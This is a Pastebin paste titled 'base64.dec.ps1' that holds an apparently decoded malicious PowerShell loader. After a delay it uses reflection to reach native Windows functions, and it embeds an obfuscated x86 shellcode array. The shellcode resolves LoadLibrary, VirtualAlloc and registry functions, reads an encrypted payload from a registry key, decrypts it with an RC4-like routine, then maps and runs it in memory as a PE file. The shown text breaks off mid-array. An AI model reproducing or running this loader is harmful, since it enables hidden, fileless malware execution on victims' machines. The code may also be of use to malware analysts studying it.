Advertisement
opexxx

base64.dec.ps1

Jul 5th, 2017
337
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #gjjwgqbltupgotintab
  2. sleep(15);try{
  3. #hvxwa
  4. function gdelegate{
  5. #ymuc
  6. Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
  7. #knlat
  8. $TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
  9. #eiwi
  10. $TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
  11. #fjrsf
  12. $TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
  13. #ukvvnycrqm
  14. return $TypeBuilder.CreateType();}
  15. #mfiecrjjim
  16. function gproc{
  17. #ooeeet
  18. Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
  19. #wpiuqrkn
  20. $SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
  21. #czljhv
  22. $UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
  23. #ndsnqk
  24. return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
  25. #fsjzs
  26. [Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,0x52,0x30,<#cr#>0x8B,0x52,0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,0x6A,0x18,0x59,0x31,<#xk#>0xFF,0x31,0xC0,<#ka#>0xAC,0x3C,<#wbj#>0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,<#dwv#>0x01,0xC7,0xE2,<#nu#>0xF0,0x81,0xFF,0x5B,0xBC,0x4A,0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,0x5D,0xFC,0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,<#wf#>0x4D,0x5A,0x0F,0x85,0x0F,0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,<#qh#>0x54,0x24,<#gfi#>0x04,0x83,<#bg#>0xC4,0x08,0x89,0x45,<#uhh#>0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,<#kp#>0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,0x45,0xCC,<#rk#>0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0xCB,0x01,0x00,0x00,<#ag#>0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,<#wve#>0x13,0x54,0x24,0x04,0x83,<#gl#>0xC4,0x08,0x03,0x04,0x24,<#vzt#>0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x61,0x72,0x79,0x41,0x75,0x40,0x8D,<#ac#>0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,<#ght#>0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,<#tl#>0x1C,0x03,0x55,0xFC,0x0F,0xB7,<#gen#>0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,0x81,0x39,0x47,0x65,0x74,0x50,0x75,0x56,0x8D,<#yd#>0x41,0x04,0x81,0x38,0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,0x75,0x38,0x8B,<#aeb#>0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,<#wa#>0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,<#vkg#>0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,<#gvf#>0x03,0xD0,0x8B,0x02,<#cvq#>0x03,0x45,0xFC,0x89,0x45,0xB8,0x81,0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,<#cyo#>0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,<#yt#>0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,<#lnj#>0xFC,0x89,0x45,<#oh#>0xA8,0x81,0x39,0x45,0x78,0x69,0x74,0x75,<#ske#>0x63,0x8D,0x41,0x04,0x81,0x38,0x50,0x72,0x6F,0x63,0x75,0x58,0x8D,0x41,0x08,<#ev#>0x80,<#oc#>0x38,0x65,0x75,<#mrm#>0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,<#cl#>0x50,0x8B,0xC6,0x03,0xC0,<#ucr#>0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0x3E,0xFE,0xFF,0xFF,0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,<#dfo#>0xFF,0x76,0xC6,0x85,0x32,<#lj#>0xFF,0xFF,<#vl#>0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,0x85,0x34,0xFF,0xFF,<#sqc#>0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,0x85,0x36,0xFF,0xFF,<#lxk#>0xFF,0x32,0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3B,0xFF,0xFF,0xFF,0x00,0x8D,0x85,0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,<#uil#>0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,0x81,<#uw#>0x38,0x4D,0x5A,0x0F,<#iu#>0x85,0x4F,0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,<#tlr#>0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,<#pf#>0x81,0x38,0x50,0x45,0x00,0x00,<#iq#>0x0F,0x85,0x26,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,<#an#>0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0xC3,<#rza#>0x33,0xD2,0x52,0x50,0x8B,<#am#>0x45,<#zsh#>0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,<#gp#>0x8B,0x08,0x03,0xCB,<#qpo#>0x81,0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,<#sct#>0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,<#fz#>0x78,<#wtb#>0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,<#gd#>0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,<#jj#>0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,<#mc#>0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,<#he#>0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,0x8D,0x41,0x04,0x81,0x38,0x75,0x65,<#fuk#>0x72,0x79,0x75,0x53,0x8D,0x41,0x08,0x81,<#hpw#>0x38,<#iqk#>0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,0x38,0x65,0x45,0x78,0x41,<#tf#>0x75,0x3D,0x83,0xC1,0x10,0x80,0x39,0x00,0x75,0x35,0x8B,0x45,<#jq#>0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,<#fx#>0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,<#vt#>0x89,<#cj#>0x45,0xAC,0x46,0xFF,<#cx#>0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,<#lh#>0xFE,0xFF,0xFF,0x8B,0x45,0x08,<#bv#>0x05,0x48,0x0A,0x00,0x00,0x89,0x85,0x7C,<#od#>0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,<#if#>0xE4,0x00,0x00,0x00,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,<#rqo#>0x33,0xC0,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x33,<#knd#>0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,<#sx#>0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,<#zm#>0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x02,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,<#tun#>0x6A,0x00,<#ecy#>0x8D,<#bmk#>0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,<#pg#>0x75,<#xi#>0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,<#su#>0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,<#it#>0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,<#ig#>0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,<#tlf#>0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#wu#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,<#ym#>0x85,0xB8,<#wr#>0x00,0x00,0x00,0x33,0xC0,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,<#svc#>0x70,0xFF,0xFF,0xFF,<#sxo#>0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,<#nvu#>0xFF,0x50,<#qe#>0x6A,0x00,0x8B,0x85,<#svg#>0x7C,0xFF,<#sb#>0xFF,0xFF,0x83,0xC0,<#rd#>0x41,0x50,0x8B,0x85,<#bjb#>0x70,0xFF,0xFF,0xFF,0x50,<#uqn#>0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,<#qes#>0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,<#gd#>0x00,0x8B,<#ybe#>0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,0x64,0xFF,0xFF,<#aw#>0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,<#sfe#>0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,<#rtl#>0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x84,<#pgw#>0xDB,<#gco#>0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xDC,0x00,0x00,0x00,0x50,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,<#qm#>0x52,0x50,0x8D,0x85,0x00,0xFA,0xFF,0xFF,0x50,<#gct#>0xFF,0x95,<#cw#>0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,<#uy#>0xFF,0x89,0x31,0x46,0x83,0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,<#km#>0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,<#fz#>0x8D,0x8D,0x00,<#gq#>0xFB,0xFF,<#rk#>0xFF,0x03,0x19,<#woi#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,<#ayx#>0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,<#xt#>0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,0x00,0x00,0x00,0x8A,0x01,0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,<#kw#>0x00,0xFB,0xFF,0xFF,0x46,<#cmt#>0x83,0xC1,0x04,0x81,<#thd#>0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,0x33,0xDB,0x33,0xFF,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,<#na#>0xFF,0xFF,0xFF,<#wo#>0x50,0x6A,0x00,0xFF,<#sh#>0x55,0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,<#ck#>0xBD,0x5C,0xFF,0xFF,0xFF,0x00,0x74,0x29,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x4C,0xFF,0xFF,0xFF,0x8B,0x85,<#tkg#>0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#kf#>0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,<#slk#>0xFF,0xFF,0xFF,0x48,0x85,0xC0,0x72,0x74,0x40,0x89,<#udx#>0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,<#xdr#>0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,<#ndu#>0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,<#ngz#>0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,<#eet#>0xFF,0x00,0x00,0x00,0x32,0x84,<#ta#>0x95,<#efk#>0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,0x04,0x32,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,<#poh#>0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,<#qy#>0x50,0x03,0xDB,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x53,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x84,<#pab#>0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,<#rmx#>0x54,0x50,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x50,0x8B,<#cj#>0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,<#bzh#>0x04,0x8B,0x85,0x7C,0xFF,0xFF,<#ze#>0xFF,0x05,0xE0,<#ux#>0x00,0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,<#he#>0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xD0,0x8B,<#cx#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,<#ond#>0x78,0xFF,0xFF,0xFF,0x6A,0x60,<#njo#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x8B,<#cwg#>0x95,0x7C,0xFF,0xFF,0xFF,0x03,0x82,0xE0,0x00,<#rbs#>0x00,0x00,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,<#nc#>0xD0,<#mfa#>0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,0x7C,0x5F,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,<#xh#>0xD0,0x81,0xC2,<#biq#>0xF8,0x00,0x00,0x00,<#lqy#>0x8B,0xCE,<#ne#>0xC1,0xE1,0x03,0x8D,0x0C,0x89,0x03,0xD1,0x89,0x95,0x50,0xFF,0xFF,0xFF,0x8B,<#mxj#>0x95,0x50,0xFF,<#bo#>0xFF,0xFF,0x8B,0x52,0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,<#ik#>0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,0x40,0x0C,<#ird#>0x03,0x45,0xF8,0x50,0xFF,<#bz#>0x95,0x78,0xFF,0xFF,0xFF,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,<#spd#>0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,0x34,0x3B,0x45,0xF8,0x0F,0x84,0xCB,0x00,0x00,0x00,<#cr#>0x8B,0x45,0xD0,0x8B,<#pz#>0x55,0xF8,0x2B,0x50,<#lzw#>0x34,0x89,0x55,0xD8,0x8B,0x45,0xF8,0x89,<#dz#>0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,0x00,0x00,0x00,0x00,0x0F,0x86,0x87,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,0x00,0x00,0x00,0x03,0x45,0xF0,0x89,<#nb#>0x45,0xEC,0xEB,0x6E,0x8B,<#vrq#>0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,<#vt#>0x89,0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,0xE4,0x8B,0x45,0xEC,0x8B,0x40,0x04,<#xke#>0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,0x75,0x10,0x8B,0x45,0xE8,<#pnf#>0x03,0xC1,0x89,0x45,0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,<#qkc#>0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0xC9,0x8B,0x45,<#ije#>0xEC,0x8B,0x40,0x04,0x03,0x45,0xEC,0x89,0x45,0xEC,0x8B,0x45,<#sta#>0xEC,0x83,<#ph#>0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,0x45,0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,<#yr#>0xFF,<#rwb#>0xFF,0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,<#dg#>0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#jhi#>0x86,0x9E,0x00,0x00,0x00,0x8B,0x45,0xD0,<#ak#>0x8B,0x80,0x80,0x00,0x00,0x00,0x03,0x45,0xF8,0x89,0x45,0x8C,0xEB,0x7F,0x03,0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x74,0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,<#nq#>0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x88,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,<#hri#>0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,0x8B,0x30,0xF7,<#ezd#>0xC6,0x00,0x00,0x00,0x80,0x74,0x12,0x81,0xE6,0xFF,0xFF,<#kb#>0x00,0x00,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,<#hfh#>0x89,0x02,0xEB,0x10,0x03,0x75,0xF8,0x83,0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0x83,0x45,0x88,0x04,<#swp#>0x83,0x45,0x84,0x04,0x8B,0x45,0x88,0x83,0x38,0x00,0x75,0xC1,<#khk#>0x83,0x45,<#xj#>0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,<#qvi#>0xFF,0xFF,0x8B,0x45,0xD0,0x8B,0x40,0x28,<#zs#>0x03,<#fqx#>0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,<#od#>0x75,0xF8,<#dr#>0xFF,0x55,0xF4,0x6A,0x00,0xFF,0x55,0xA4,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x8D,0x40,0x00,<#dkp#>0x73,0x6F,0x66,0x74,0x77,<#qjw#>0x61,0x72,0x65,0x5C,0x36,0x49,0x41,0x73,0x6D,0x54,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#ua#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wnf#>0x00,0x00,0x00,0x41,0x38,0x49,<#fv#>0x41,0x68,0x51,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#nic#>0x00,0x00,0x00,0x00,0x38,<#tle#>0x7A,0x9F,0xEC,0xFE,0x09,0x5E,<#vfx#>0x22,0x24,0x7A,0x5B,0xDC,0x55,0x8A,0xAD,<#ud#>0x6E,0x67,0x2A,0xD7,0x17,0xE1,0x37,0x0A,0xC5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x3C,0x00,<#wft#>0x3C,0x00,0x3A,0x00,0x3A,0x00,0x3E,0x00,0x3E,0x00,0x73,0x00,0x68,<#fm#>0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x62,0x00,0x70,0x00,0x73,0x00,0x3A,0x00,0x3A,<#lz#>0x00,<#hx#>0x62,0x00,0x70,0x00,0x73,0x00,0x6E,<#rd#>0x00,0x75,0x00,0x6D,<#wue#>0x00,0x3A,0x00,0x38,0x00,0x36,0x00,0x34,0x00,0x3A,0x00,0x6E,0x00,<#qsw#>0x75,<#cza#>0x00,<#ew#>0x6D,0x00,0x00,<#jd#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#af#>0x00,0x00,<#ck#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0